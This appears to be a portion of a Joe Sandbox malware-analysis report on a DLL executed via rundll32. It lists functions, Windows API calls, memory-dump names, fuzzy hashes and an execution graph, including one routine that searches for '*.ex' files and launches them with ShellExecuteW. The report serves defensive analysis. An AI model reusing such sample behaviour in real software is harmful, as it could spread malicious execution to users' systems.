                    • Associated: 0000000B.00000002.2946793531.000000006C7C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947205162.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947228750.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947255732.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947279452.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947306603.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947331721.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947353509.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947373410.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947396143.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947440734.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: AttributesErrorFileLast
                    • String ID:
                    • API String ID: 1799206407-0
                    • Opcode ID: 845c4e0a07b4209742a7abc3bb07569dfd69de78d73716a4e83f58ce514cda68
                    • Instruction ID: 5f0f7e7ea8be7b168c88806b5c3472d01257391c96b1191476f9e077530efd17
                    • Opcode Fuzzy Hash: 845c4e0a07b4209742a7abc3bb07569dfd69de78d73716a4e83f58ce514cda68
                    • Instruction Fuzzy Hash: 0E018F3338720065EA22147C0F997BD21844B8F6ACF350AA3FF64E7FF0D64664576169
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C7CF1B0 Relevance: 6.1, APIs: 4, Instructions: 95threadCOMMON
                    Download Yara Rule
                    APIs
                    • GetThreadUILanguage.KERNEL32(?,00000000), ref: 6C7CF1C1
                    • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 6C7CF21F
                    • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 6C7CF27C
                    • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 6C7CF2AF
                      • Part of subcall function 6C7CF16C: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,6C7CF22D), ref: 6C7CF183
                      • Part of subcall function 6C7CF16C: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,6C7CF22D), ref: 6C7CF1A0
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2946793531.000000006C7C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 0000000B.00000002.2946773557.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2946793531.000000006C7DE000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947205162.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947228750.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947255732.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947279452.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947306603.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947331721.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947353509.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947373410.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947396143.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947440734.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: Thread$LanguagesPreferred$Language
                    • String ID:
                    • API String ID: 2255706666-0
                    • Opcode ID: 38524cf5850665df9cf5b48bc33892d882d5a614704dc25f0594f936b4266585
                    • Instruction ID: 7d7c62a33c289d1ba87bf4073128c31a696ca7eecf281a3d819c73c10b6d41ff
                    • Opcode Fuzzy Hash: 38524cf5850665df9cf5b48bc33892d882d5a614704dc25f0594f936b4266585
                    • Instruction Fuzzy Hash: B6316D70B0011B9FDB00DFE9C988AEEB7B8FF48319F508165D521E7680DB749A09CB52
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C901864 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetIconInfo.USER32(00000000,?), ref: 6C901885
                    • GetObjectW.GDI32(?,00000018,?), ref: 6C9018A6
                    • DeleteObject.GDI32(?), ref: 6C9018D2
                    • DeleteObject.GDI32(?), ref: 6C9018DB
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2946793531.000000006C7DE000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 0000000B.00000002.2946773557.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2946793531.000000006C7C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947205162.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947228750.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947255732.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947279452.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947306603.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947331721.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947353509.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947373410.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947396143.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947440734.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: Object$Delete$IconInfo
                    • String ID:
                    • API String ID: 507670407-0
                    • Opcode ID: e1fa34d2505a0d98b0d980a1e4e05cead635c3bf329b34431a48c15138f2ab39
                    • Instruction ID: 3bd0cb8fddc7ecd3b377c6987f78018e24c17f8e04207c1ebebeb321875026a5
                    • Opcode Fuzzy Hash: e1fa34d2505a0d98b0d980a1e4e05cead635c3bf329b34431a48c15138f2ab39
                    • Instruction Fuzzy Hash: 15113A71A00208EFDB04CFA9D9948EEB7FDFB89214B2185A9EC04D7B45DB30EA049A50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C7E90F8 Relevance: 6.1, APIs: 4, Instructions: 57timefileCOMMON
                    Download Yara Rule
                    APIs
                    • FindNextFileW.KERNEL32(?,?), ref: 6C7E9108
                    • GetLastError.KERNEL32(?,?), ref: 6C7E9111
                    • FileTimeToLocalFileTime.KERNEL32(?), ref: 6C7E912D
                    • FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 6C7E9152
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2946793531.000000006C7DE000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 0000000B.00000002.2946773557.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2946793531.000000006C7C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947205162.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947228750.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947255732.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947279452.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947306603.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947331721.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947353509.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947373410.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947396143.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947440734.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: FileTime$DateErrorFindLastLocalNext
                    • String ID:
                    • API String ID: 2103556486-0
                    • Opcode ID: bca9f731e73c50030d592aa4bd0febf8babf0700642abe26abbb22e1f079f7c0
                    • Instruction ID: 2e65258d0ac6d0f03ed1bdb7a68fb7340ebfd0372f519d0cdd6e0562dcea1a80
                    • Opcode Fuzzy Hash: bca9f731e73c50030d592aa4bd0febf8babf0700642abe26abbb22e1f079f7c0
                    • Instruction Fuzzy Hash: D811F1B16042019FC744DF69C9C5987B7E9BF8C304B4589AAED48CB309E735E904CB62
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C882940 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                    Download Yara Rule
                    APIs
                    • FindResourceW.KERNEL32(00000001,?,?,6C852F04,00000001,6C7C0000,00000000,?,6C88282E,00000000,?,?,00000000,00000000,?,6C902798), ref: 6C882957
                    • LoadResource.KERNEL32(00000001,6C8829DC,00000001,?,?,6C852F04,00000001,6C7C0000,00000000,?,6C88282E,00000000,?,?,00000000,00000000), ref: 6C882971
                    • SizeofResource.KERNEL32(00000001,6C8829DC,00000001,6C8829DC,00000001,?,?,6C852F04,00000001,6C7C0000,00000000,?,6C88282E,00000000,?,?), ref: 6C88298B
                    • LockResource.KERNEL32(6C87FB64,00000000,00000001,6C8829DC,00000001,6C8829DC,00000001,?,?,6C852F04,00000001,6C7C0000,00000000,?,6C88282E,00000000), ref: 6C882995
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2946793531.000000006C7DE000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 0000000B.00000002.2946773557.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2946793531.000000006C7C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947205162.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947228750.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947255732.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947279452.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947306603.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947331721.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947353509.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947373410.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947396143.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947440734.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: Resource$FindLoadLockSizeof
                    • String ID:
                    • API String ID: 3473537107-0
                    • Opcode ID: 60e6fbf0a250305a67a898fb0c774dc650f9b481f28f0fc701b5980bbba3e178
                    • Instruction ID: 0eb8a8b1d993eac0f96d79af77241e4d51f4c3b7013d280ba9e58325a2a34988
                    • Opcode Fuzzy Hash: 60e6fbf0a250305a67a898fb0c774dc650f9b481f28f0fc701b5980bbba3e178
                    • Instruction Fuzzy Hash: 5EF0AD726052006F4B15DE5CAE88D9B77ECEF882A831005AAFC18C7B09DB34ED044374
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C9DB600 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 78COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 6C7E9194: FindFirstFileW.KERNEL32(00000000,?,?,?,00000000,6C9DB693,6C9DB774,*.ex,?,00000000,6C9DB730,?,?,?,6C9DBB7C,6C9DBCE4), ref: 6C7E91AF
                    • ShellExecuteW.SHELL32(00000000,open,00000000,?,?,?), ref: 6C9DB6D1
                      • Part of subcall function 6C7E91E4: FindNextFileW.KERNEL32(?,?,00000000,6C9DB6E1,00000000,00000000,00000005,6C9DB774,*.ex,?,00000000,6C9DB730,?,?,?,6C9DBB7C), ref: 6C7E91EF
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2946793531.000000006C7DE000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 0000000B.00000002.2946773557.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2946793531.000000006C7C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947205162.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947228750.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947255732.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947279452.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947306603.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947331721.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947353509.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947373410.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947396143.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947440734.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: FileFind$ExecuteFirstNextShell
                    • String ID: *.ex$open
                    • API String ID: 3619075738-2459981157
                    • Opcode ID: e648a4529870fd94eb0fe3920fc78a62bb835052bb99f8ffb8929c261b32d8a6
                    • Instruction ID: e8ba476c024b55775cbaf51e2be40fabe4a8f846a98d5e6c58e2e50541491aab
                    • Opcode Fuzzy Hash: e648a4529870fd94eb0fe3920fc78a62bb835052bb99f8ffb8929c261b32d8a6
                    • Instruction Fuzzy Hash: 89312874A0021E9FDB50DFA0CD89BDEB7B8AB48315F6185A5E418B3B50DB30AA498B51
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Execution Graph

                    Execution Coverage:5.1%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:0%
                    Total number of Nodes:109
                    Total number of Limit Nodes:3
                    execution_graph 409 6c7c6180 410 6c7c6218 409->410 411 6c7c6190 409->411 414 6c7c5ab8 410->414 415 6c7c6221 410->415 412 6c7c619d 411->412 413 6c7c61d4 411->413 417 6c7c61a8 412->417 423 6c7c5c04 10 API calls 412->423 416 6c7c5c04 10 API calls 413->416 418 6c7c6493 414->418 421 6c7c5adc VirtualQuery 414->421 422 6c7c5bbb 414->422 419 6c7c6239 415->419 437 6c7c6348 415->437 420 6c7c61eb 416->420 425 6c7c625c 419->425 430 6c7c6320 419->430 460 6c7c6240 419->460 427 6c7c6213 420->427 432 6c7c61f7 420->432 438 6c7c5b15 421->438 439 6c7c5b83 421->439 428 6c7c5bc1 422->428 434 6c7c5c04 10 API calls 422->434 429 6c7c61b5 423->429 424 6c7c63ac 426 6c7c5c04 10 API calls 424->426 451 6c7c63c5 424->451 443 6c7c629c Sleep 425->443 425->460 431 6c7c645c 426->431 435 6c7c61cf 429->435 436 6c7c61b9 429->436 440 6c7c5c04 10 API calls 430->440 446 6c7c6469 431->446 431->451 456 6c7c5f88 10 API calls 432->456 441 6c7c5bd2 434->441 452 6c7c5f88 10 API calls 436->452 437->424 442 6c7c6384 Sleep 437->442 437->451 438->439 449 6c7c5b40 438->449 450 6c7c5b42 VirtualAlloc 438->450 470 6c7c5c04 439->470 445 6c7c6329 440->445 441->428 457 6c7c5be0 441->457 442->424 447 6c7c639e Sleep 442->447 448 6c7c62b4 Sleep 443->448 443->460 454 6c7c632d 445->454 455 6c7c6343 445->455 463 6c7c5f88 10 API calls 446->463 447->437 448->425 449->450 450->439 458 6c7c5b58 VirtualAlloc 450->458 459 6c7c61cd 452->459 453 6c7c5b8a 453->428 467 6c7c5b98 453->467 465 6c7c5f88 10 API calls 454->465 461 6c7c6211 456->461 464 6c7c5f88 10 API calls 457->464 458->439 462 6c7c5b6e 458->462 459->435 461->427 462->428 466 6c7c6480 463->466 464->428 468 6c7c6341 465->468 494 6c7c5f88 467->494 468->455 471 6c7c5c1c 470->471 472 6c7c5e64 470->472 482 6c7c5c2e 471->482 484 6c7c5cb9 Sleep 471->484 473 6c7c5f7c 472->473 474 6c7c5e28 472->474 475 6c7c5f85 473->475 476 6c7c59b0 VirtualAlloc 473->476 483 6c7c5e42 Sleep 474->483 485 6c7c5e82 474->485 475->453 478 6c7c59eb 476->478 479 6c7c59db 476->479 477 6c7c5c3d 477->453 478->453 514 6c7c5964 479->514 481 6c7c5d1c 493 6c7c5d28 481->493 519 6c7c58e8 481->519 482->477 482->481 488 6c7c5cfd Sleep 482->488 483->485 486 6c7c5e58 Sleep 483->486 484->482 487 6c7c5ccf Sleep 484->487 489 6c7c58e8 VirtualAlloc 485->489 490 6c7c5ea0 485->490 486->474 487->471 488->481 492 6c7c5d13 Sleep 488->492 489->490 490->453 492->482 493->453 495 6c7c5f9d 494->495 496 6c7c6080 494->496 498 6c7c5fa3 495->498 502 6c7c601a Sleep 495->502 497 6c7c5a14 496->497 496->498 499 6c7c617a 497->499 500 6c7c5964 2 API calls 497->500 501 6c7c5fac 498->501 504 6c7c605e Sleep 498->504 509 6c7c6095 498->509 499->462 505 6c7c5a25 500->505 501->462 502->498 503 6c7c6034 Sleep 502->503 503->495 506 6c7c6074 Sleep 504->506 504->509 507 6c7c5a3b VirtualFree 505->507 508 6c7c5a55 505->508 506->498 510 6c7c5a4c 507->510 508->510 511 6c7c5a5e VirtualQuery VirtualFree 508->511 512 6c7c6114 VirtualFree 509->512 513 6c7c60b8 509->513 510->462 511->508 511->510 512->462 513->462 515 6c7c59ac 514->515 516 6c7c596d 514->516 515->478 516->515 517 6c7c5978 Sleep 516->517 517->515 518 6c7c5992 Sleep 517->518 518->516 520 6c7c587c 519->520 521 6c7c58f1 VirtualAlloc 520->521 522 6c7c5908 521->522 522->493

                    Callgraph

                    Executed Functions

                    Function 6C7C58E8 Relevance: 1.3, APIs: 1, Instructions: 41memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,?,6C7C5EFF), ref: 6C7C58FF
                    Memory Dump Source
                    • Source File: 0000000D.00000002.1864689717.000000006C7C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 0000000D.00000002.1864667575.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000D.00000002.1864689717.000000006C7DE000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000D.00000002.1865187281.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000D.00000002.1865314563.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000D.00000002.1865339541.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000D.00000002.1865361125.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000D.00000002.1865384535.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000D.00000002.1865410095.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000D.00000002.1865429222.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000D.00000002.1865446874.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000D.00000002.1865466232.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000D.00000002.1865487817.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000D.00000002.1865508983.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000D.00000002.1865508983.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: b07b5c47dd708c648f9113094805e2a77233329719ea020010033c7f4deb6e9c
                    • Instruction ID: 4794626067cc3563887c76531e53d3a075ca025a932c8d9a31275ab1644736e6
                    • Opcode Fuzzy Hash: b07b5c47dd708c648f9113094805e2a77233329719ea020010033c7f4deb6e9c
                    • Instruction Fuzzy Hash: 58F0AFF6B013025FFB548F789A857827BE9A709354F51427EEA09DBBC4E7B088008780
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    Function 6C7C5F88 Relevance: 12.2, APIs: 8, Instructions: 221sleepCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 5 6c7c5f88-6c7c5f97 6 6c7c5f9d-6c7c5fa1 5->6 7 6c7c6080-6c7c6083 5->7 8 6c7c6004-6c7c600d 6->8 9 6c7c5fa3-6c7c5faa 6->9 10 6c7c6089-6c7c6093 7->10 11 6c7c6170-6c7c6174 7->11 8->9 18 6c7c600f-6c7c6018 8->18 12 6c7c5fac-6c7c5fb7 9->12 13 6c7c5fd8-6c7c5fda 9->13 14 6c7c6044-6c7c6051 10->14 15 6c7c6095-6c7c60a1 10->15 16 6c7c617a-6c7c617f 11->16 17 6c7c5a14-6c7c5a39 call 6c7c5964 11->17 21 6c7c5fb9-6c7c5fbe 12->21 22 6c7c5fc0-6c7c5fd5 12->22 25 6c7c5fdc-6c7c5fed 13->25 26 6c7c5fef 13->26 14->15 19 6c7c6053-6c7c605c 14->19 23 6c7c60d8-6c7c60e6 15->23 24 6c7c60a3-6c7c60a6 15->24 36 6c7c5a3b-6c7c5a4a VirtualFree 17->36 37 6c7c5a55-6c7c5a5c 17->37 18->8 27 6c7c601a-6c7c602e Sleep 18->27 19->14 29 6c7c605e-6c7c6072 Sleep 19->29 31 6c7c60aa-6c7c60ae 23->31 33 6c7c60e8-6c7c60ed call 6c7c57dc 23->33 24->31 25->26 32 6c7c5ff2-6c7c5fff 25->32 26->32 27->9 28 6c7c6034-6c7c603f Sleep 27->28 28->8 29->15 35 6c7c6074-6c7c607b Sleep 29->35 38 6c7c60f0-6c7c60fd 31->38 39 6c7c60b0-6c7c60b6 31->39 32->10 33->31 35->14 42 6c7c5a4c-6c7c5a4e 36->42 43 6c7c5a50-6c7c5a53 36->43 46 6c7c5a5e-6c7c5a7a VirtualQuery VirtualFree 37->46 38->39 41 6c7c60ff-6c7c6106 call 6c7c57dc 38->41 44 6c7c6108-6c7c6112 39->44 45 6c7c60b8-6c7c60d6 call 6c7c581c 39->45 41->39 50 6c7c5a8f-6c7c5a91 42->50 43->50 48 6c7c6114-6c7c613c VirtualFree 44->48 49 6c7c6140-6c7c616d call 6c7c587c 44->49 52 6c7c5a7c-6c7c5a7f 46->52 53 6c7c5a81-6c7c5a87 46->53 54 6c7c5aa6-6c7c5ab6 50->54 55 6c7c5a93-6c7c5aa3 50->55 52->50 53->50 59 6c7c5a89-6c7c5a8d 53->59 55->54 59->46
                    APIs
                    • Sleep.KERNEL32(00000000,?), ref: 6C7C601E
                    • Sleep.KERNEL32(0000000A,00000000,?), ref: 6C7C6038
                    Memory Dump Source
                    • Source File: 0000000D.00000002.1864689717.000000006C7C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 0000000D.00000002.1864667575.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000D.00000002.1864689717.000000006C7DE000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000D.00000002.1865187281.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000D.00000002.1865314563.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000D.00000002.1865339541.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000D.00000002.1865361125.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000D.00000002.1865384535.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000D.00000002.1865410095.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000D.00000002.1865429222.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000D.00000002.1865446874.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000D.00000002.1865466232.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000D.00000002.1865487817.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000D.00000002.1865508983.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000D.00000002.1865508983.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: f2b55a5635ffe03798493215ae9a491c37686f258a2c6a37dfe4f4378f1983c8
                    • Instruction ID: 4a11ff699402e1e4b79fbe227a1ba2f541035c54c3402bb1390fa3f6465090d2
                    • Opcode Fuzzy Hash: f2b55a5635ffe03798493215ae9a491c37686f258a2c6a37dfe4f4378f1983c8
                    • Instruction Fuzzy Hash: 627124713443028FE741CB29DAC8B6ABBE5AF86318F18827AD544CBBC1D7719984C753
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C7C6180 Relevance: 10.9, APIs: 7, Instructions: 406COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
